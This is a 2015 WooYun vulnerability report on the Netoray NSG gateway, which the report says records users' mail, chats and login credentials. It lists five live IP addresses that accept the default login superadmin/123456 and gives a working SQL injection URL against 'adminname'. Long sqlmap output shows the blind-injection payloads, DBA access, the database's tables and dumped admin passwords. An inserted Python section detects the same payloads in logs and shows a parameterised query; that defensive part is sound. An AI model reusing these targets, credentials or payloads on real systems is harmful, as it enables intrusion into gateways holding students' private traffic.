
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0102342

Title: 莱克斯科技 internet behaviour management system has a default password and SQL injection with DBA privileges (in the sampled case, the privacy of an entire university's staff and students is at risk)

Vendor: 莱克斯科技(北京)有限公司

Author: 路人甲

Submitted: 2015-03-19 15:08

Fixed: 2015-06-22 08:58

Published: 2015-06-22 08:58

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-19: details sent to the vendor; awaiting vendor handling
2015-03-24: vendor confirmed; details visible to the vendor only
2015-03-27: details opened to third-party security partners
2015-05-18: details opened to core white hats and domain experts
2015-05-28: details opened to regular white hats
2015-06-07: details opened to intern white hats
2015-06-22: details opened to the public

Summary:

It is hard not to be shocked that this "internet behaviour management system" records the content of mail sent and received through every major webmail provider, full QQ chat logs, Fetion records, Weibo records, FTP records, telnet records and the account names and passwords of every web login, all captured in full detail (extraordinarily powerful), and that it is deployed at many universities. Where has the students' privacy gone? Anyone going online through this gateway has "no privacy whatsoever".

Details:

The Netoray NSG internet behaviour management system ships with a default password: superadmin/123456.
Logging in with the default password reveals a SQL injection point, and the database account runs with DBA privileges. The gateway's functionality is also unusually extensive: every device that goes online through it has the content of its traffic recorded in full. (One of the cases found is a university with 12000+ connected users, whose students' entire online activity is laid bare.)
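The two defects above (a default administrator password and an injectable `adminname` parameter) are the kind of thing an operator can check for without the vendor. The following is an added example written for this page; it is not the report author's code and not Netoray NSG product code. It scans constructed access-log lines for the blind-injection payload shapes that appear in the sqlmap output below, and then contrasts the string-concatenated INSERT that such an injection implies with a parameterised one. The log lines, the reduced three-column `t_sys_admin` layout, the `WATCHED_PARAMS` list and every helper name are assumptions; SQLite stands in for MySQL so the block runs offline.

```python
"""Added example (not the report author's code, not Netoray NSG code).
Part 1 flags blind-SQLi payload shapes in web-server access logs.
Part 2 contrasts a concatenated admin INSERT with a parameterised one.
Log lines, schema and helper names are constructed; SQLite replaces MySQL."""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# --- 1. Detection over web-server access logs ------------------------------
# Payload families quoted in the report's sqlmap output:
#   boolean-based blind:  asdasd' AND 9685=9685 AND 'eeEm'='eeEm
#   time-based blind:     asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) ...
BOOLEAN_BLIND = re.compile(r"'\s*(AND|OR)\s+\d+\s*=\s*\d+", re.IGNORECASE)
TIME_BLIND = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)

# Free-text parameters of usap_admin.cgi worth inspecting (assumed list).
WATCHED_PARAMS = ("adminname", "email", "ipaddr", "mac")

# Common Log Format prefix: client, ident, user, [timestamp], "request"
CLF_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]*\] "([^"]*)"')


def classify_request(request_line):
    """Return (param, technique) findings for a request line such as
    'GET /cgi-bin/system_management/usap_admin.cgi?... HTTP/1.1'."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    findings = []
    # parse_qs URL-decodes once and splits each pair on the first '=' only,
    # so a decoded payload that itself contains '=' stays inside its value.
    query = parse_qs(urlsplit(parts[1]).query, keep_blank_values=True)
    for param, values in query.items():
        if param not in WATCHED_PARAMS:
            continue
        for value in values:
            if TIME_BLIND.search(value):
                findings.append((param, "time-based blind"))
            elif BOOLEAN_BLIND.search(value):
                findings.append((param, "boolean-based blind"))
    return findings


def scan_access_log(lines):
    """Return (client_ip, param, technique) for every flagged request."""
    hits = []
    for line in lines:
        m = CLF_LINE.match(line)
        if m:
            for param, technique in classify_request(m.group(2)):
                hits.append((m.group(1), param, technique))
    return hits


# Constructed sample: one legitimate admin creation, then the two payloads.
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Mar/2015:15:01:02 +0800] "GET /cgi-bin/system_management/'
    'usap_admin.cgi?act=3&writeway=create&adminname=ops_user&pwd=x HTTP/1.1" 200 512',
    '198.51.100.7 - - [19/Mar/2015:15:01:09 +0800] "GET /cgi-bin/system_management/'
    'usap_admin.cgi?act=3&writeway=create&adminname=asdasd%27%20AND%209685%3D9685'
    '%20AND%20%27eeEm%27%3D%27eeEm&pwd=x HTTP/1.1" 200 512',
    '198.51.100.7 - - [19/Mar/2015:15:01:15 +0800] "GET /cgi-bin/system_management/'
    'usap_admin.cgi?act=3&writeway=create&adminname=asdasd%27%20AND%20%28SELECT%20'
    '%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29UrVu%29%20AND%20%27VOin%27%3D%27VOin'
    '&pwd=x HTTP/1.1" 200 512',
]

# --- 2. Concatenated vs. parameterised admin creation ----------------------
# Reduced to the three columns the report's dump of t_sys_admin shows.
ADMIN_SCHEMA = ("CREATE TABLE t_sys_admin ("
                "uid INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, password TEXT)")


def create_admin_unsafe(conn, name, pwd):
    """Defect class behind the report: the name is pasted into the SQL text,
    so a quote in it is parsed as SQL instead of being stored as data."""
    conn.execute("INSERT INTO t_sys_admin (name, password) VALUES ('%s', '%s')"
                 % (name, pwd))


def create_admin_safe(conn, name, pwd):
    """Bound parameters: the value never reaches the SQL parser."""
    conn.execute("INSERT INTO t_sys_admin (name, password) VALUES (?, ?)",
                 (name, pwd))


def stored_names(conn):
    return [r[0] for r in conn.execute("SELECT name FROM t_sys_admin ORDER BY uid")]


def compare_admin_creation(payload="asdasd' AND 9685=9685 AND 'eeEm'='eeEm"):
    """Create one admin with each routine; return the names each one stored."""
    results = []
    for create in (create_admin_unsafe, create_admin_safe):
        conn = sqlite3.connect(":memory:")
        conn.execute(ADMIN_SCHEMA)
        create(conn, payload, "123456")
        results.append(stored_names(conn))
    return tuple(results)


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("flagged:", hit)
    unsafe, safe = compare_admin_creation()
    print("concatenated INSERT stored:", unsafe, "| parameterised stored:", safe)
```

The scanner reports the second and third sample lines as boolean-based and time-based blind injection against `adminname`, while the legitimate first line is silent. In the comparison, the concatenated INSERT evaluates `'asdasd' AND 9685=9685 AND 'eeEm'='eeEm'` as an expression, and because a non-numeric string converts to 0 in both SQLite and MySQL, the stored name is the text `0`; the parameterised INSERT stores the payload verbatim, quotes and all. The `uid 81, name 0, password 123456` row in the `t_sys_admin` dump further down this report is consistent with exactly that collapse happening on the real system.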

Default-password cases:
https://121.250.28.125/
https://221.123.130.107/
https://60.30.2.74/
https://119.2.27.73/
https://117.36.195.144/

Proof of vulnerability:

[Screenshots Image 3.jpg, Image 5.jpg, Image 6.jpg, Image 7.jpg, Image 8.jpg and Image 2.jpg are not included in this text]


https://121.250.28.125/cgi-bin/system_management/usap_admin.cgi?cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=465410561&lang=zh_CN.UTF-8


sqlmap identified the following injection points with a total of 1308 HTTP(s) requests:
---
Parameter: adminname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
current database: 'NTC'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
current user is DBA: True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
[136 tables]
+----------------------------+
| nedata_ipmacbind_record |
| newurl |
| t_data_mail |
| t_data_mobileapp |
| t_data_netphone |
| t_data_nettv |
| t_data_ongame |
| t_data_operation |
| t_data_p2p |
| t_data_payinfo |
| t_data_policyroute |
| t_data_priviledge |
| t_data_proxy |
| t_data_qq_pwd |
| t_data_qq_sn |
| t_data_rdp |
| t_data_retrresult |
| t_data_sip |
| t_data_smb |
| t_data_ssh |
| t_data_ssl |
| t_data_stock |
| t_data_telnet |
| t_data_telnetcmd |
| t_data_transfile |
| t_data_unknowurl |
| t_rep_alertlog |
| t_rep_app |
| t_rep_dataindex |
| t_rep_flow |
| t_rep_get |
| t_rep_im |
| t_rep_index |
| t_rep_mail |
| t_rep_post |
| t_rep_session |
| t_rep_time |
| t_sys_aclpolicy |
| t_sys_admin |
| t_sys_admingroup |
| t_sys_admingrouprolemap |
| t_sys_adminrolemap |
| t_sys_alertlog |
| t_sys_app |
| t_sys_appbwlist |
| t_sys_appgroup |
| t_sys_billingip |
| t_sys_billinglog |
| t_sys_billingpolicy |
| t_sys_billinguser |
| t_sys_bwdevice |
| t_sys_bwginfo |
| t_sys_bwglist |
| t_sys_bwip |
| t_sys_bwpolicychannel |
| t_sys_bwpolicyvalue |
| t_sys_bwtraffic |
| t_sys_bypass |
| t_sys_cltdeviceobj |
| t_sys_cltfileobj |
| t_sys_cltosobj |
| t_sys_cltpolicycontent |
| t_sys_cltpolicymain |
| t_sys_cltpolicyuser |
| t_sys_cltportobj |
| t_sys_cltprocobj |
| t_sys_cltregobj |
| t_sys_clttime |
| t_sys_cntuser |
| t_sys_command_transit |
| t_sys_customreport |
| t_sys_customsubnet |
| t_sys_datasync |
| t_sys_dumptable |
| t_sys_filefeature |
| t_sys_functions |
| t_sys_help |
| t_sys_httptype |
| t_sys_ignoresuffix |
| t_sys_keylib |
| t_sys_keyword |
| t_sys_killexecute |
| t_sys_l3switch |
| t_sys_localip |
| t_sys_managelog |
| t_sys_mobileuser_log |
| t_sys_modules |
| t_sys_monif |
| t_sys_netcapture |
| t_sys_ntpserver |
| t_sys_pages |
| t_sys_parameter |
| t_sys_queryinfo |
| t_sys_resources |
| t_sys_retrtask |
| t_sys_role |
| t_sys_roleusergroupmap |
| t_sys_roleusermap |
| t_sys_rule |
| t_sys_ruleactdef |
| t_sys_ruleipobj |
| t_sys_ruleopconf |
| t_sys_ruleopdef |
| t_sys_ruleoptdef |
| t_sys_rulewarndef |
| t_sys_snmp |
| t_sys_snmp_trap |
| t_sys_subnetgroup |
| t_sys_timepolicy |
| t_sys_timepolicyscope |
| t_sys_uplink_default_param |
| t_sys_uplink_dev_list |
| t_sys_uplink_local |
| t_sys_uplink_upload_index |
| t_sys_uplink_upload_work |
| t_sys_uplink_vector |
| t_sys_uplinkversion |
| t_sys_urlbwlist |
| t_sys_urlclass |
| t_sys_urllib |
| t_sys_user |
| t_sys_user_bwlist |
| t_sys_user_macbwlist |
| t_sys_usergroup |
| t_sys_useronline |
| t_sys_useronline_history |
| t_sys_useronlinelog |
| t_sys_versionlog |
| t_sys_warnmail |
| t_sys_warnpage |
| t_sys_webmail |
| v_sys_adminvalidroles |
| v_sys_adminvalidusergroups |
| v_sys_adminvalidusers |
| v_sys_rolevalidusergroups |
| v_sys_rolevalidusers |
+----------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
Table: t_sys_user
[33 columns]
+--------------+------------------+
| Column | Type |
+--------------+------------------+
| check_valid | int(11) |
| circle_check | int(11) |
| create_time | datetime |
| creator | varchar(64) |
| eip | int(10) unsigned |
| end_time | datetime |
| false_times | int(11) |
| fee | float |
| free_audit | int(11) |
| gid | int(32) unsigned |
| invalid_date | int(11) |
| invalid_time | datetime |
| invalid_unit | int(11) |
| key_user | int(11) |
| ldap_name | varchar(64) |
| lock_time | int(11) |
| login_time | datetime |
| mac | varchar(32) |
| name | varchar(64) |
| permit_times | int(11) |
| pwd | varchar(64) |
| real_name | varchar(64) |
| settle_type | int(11) |
| share_number | int(11) |
| sip | int(10) unsigned |
| start_time | datetime |
| status | char(1) |
| tel | char(32) |
| uid | int(32) unsigned |
| unlock_time | datetime |
| valid_date | int(11) |
| valid_time | datetime |
| valid_unit | int(11) |
+--------------+------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
Table: t_sys_user
[0 entries]
+----------+-----+
| key_user | pwd |
+----------+-----+
+----------+-----+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
Table: t_sys_user
[0 entries]
+----------+-----+------+
| key_user | pwd | name |
+----------+-----+------+
+----------+-----+------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
Table: t_sys_admin
[17 columns]
+---------------+---------------------+
| Column | Type |
+---------------+---------------------+
| activated | char(1) |
| burst | int(32) unsigned |
| email | char(64) |
| endtime | datetime |
| ipaddr | varchar(16) |
| locked | tinyint(3) unsigned |
| lockedtime | datetime |
| logincount | tinyint(3) unsigned |
| macaddr | varchar(18) |
| maxlogincount | tinyint(3) unsigned |
| name | char(64) |
| password | varchar(16) |
| shortcut | varchar(256) |
| starttime | datetime |
| ugid | int(32) unsigned |
| uid | int(32) unsigned |
| unlocktime | int(32) unsigned |
+---------------+---------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
Table: t_sys_admin
[5 entries]
+-----+------------+----------+
| uid | name | password |
+-----+------------+----------+
| 1 | superadmin | 123456 |
| 2 | manager | 123456 |
| 3 | maintainer | 123456 |
| 80 | asdasd | 123456 |
| 81 | 0 | 123456 |
+-----+------------+----------+

Fix recommendation:

Contact the vendor.

Copyright: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-03-24 08:56

Vendor reply:

CNVD has confirmed and reproduced the reported situation; CNVD will notify the software vendor, 深圳莱克斯公司.

Latest status:

None yet